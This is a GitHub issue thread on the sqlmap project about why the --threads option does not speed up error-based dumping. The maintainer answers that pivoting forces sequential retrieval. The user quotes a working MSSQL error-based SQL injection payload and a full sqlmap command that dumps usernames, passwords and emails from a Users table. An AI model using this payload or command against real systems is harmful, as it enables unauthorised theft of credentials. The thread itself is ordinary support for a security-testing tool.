### ISSUE TITLE
Is --threads not supported in Error technique?

### ISSUE THREAD

**Issue by cat-from-attic** [sqlmapproject/sqlmap#4534]
Don't know if it bug at all 😄 
is --threads=5 or --threads=10 is not supported by 

 Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - ORDER BY clause
    Payload: sortedby=CreateDate ASC,(SELECT 2139 WHERE 2139=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2139=2139) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113))))

I;m dumping data and wanted to go faster and put --threads=5 or --threads=10 but threads din't increased dumping speed.
I see in burp suite proxy history that sqlmap when dumping via Error tehnique sending one http request and another only after recieving response from previous request
Or i'm putting --threads in wrong place? Is it should be after or before -u?

`python sqlmap.py --force-ssl --level 5 --risk 3 --random-agent --technique=E --dbms=mssql -u "url" -v 1 --proxy=http://127.0.0.1:8080  -D main -T Users -C Id,Username,Password,Email --dump --threads=10 --fresh-queries --force-pivoting`

**Comment by stamparm** [comment]
Pivoting requires sequential data retrieval
